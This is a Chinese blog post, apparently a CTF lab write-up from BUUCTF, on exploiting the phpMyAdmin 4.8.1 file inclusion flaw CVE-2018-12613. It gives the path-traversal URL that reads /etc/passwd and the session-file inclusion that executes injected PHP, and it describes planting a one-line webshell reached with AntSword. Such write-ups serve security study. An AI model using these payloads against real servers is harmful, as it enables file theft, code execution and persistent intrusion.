phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

使用的是BUUCTF里的环境。
影响版本:4.8.0——4.8.1
访问http://your-ip:8080/index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd,可见/etc/passwd被读取,说明文件包含漏洞存在:

利用方式也比较简单,可以执行一下SELECT ‘<?=phpinfo()?>’;,然后查看自己的sessionid(cookie中phpMyAdmin的值),然后包含session文件即可:
payload:
1.

index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

2.执行SQL语句
在这里插入图片描述并查看其cookie(这里注意是响应端里的cookie)

3.包含这个cookie文件,那么就会执行刚才我们输入的那段代码

index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_c88435750da4901d3cd2dc4f69c8ccb1

(代码sess_后是刚才查看的cookie)

这说明我们可以通过任意代码执行的方法来getshell的

创建一个a.php并写入一句话木马,这个a,php是被存放在根目录下的。

在这里插入图片描述
这里包含一下这个session文件,把一句话木马包含进去。
在这里插入图片描述
之后用蚁剑成功连接。 要注意这个a.php是存放在根目录下的
在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值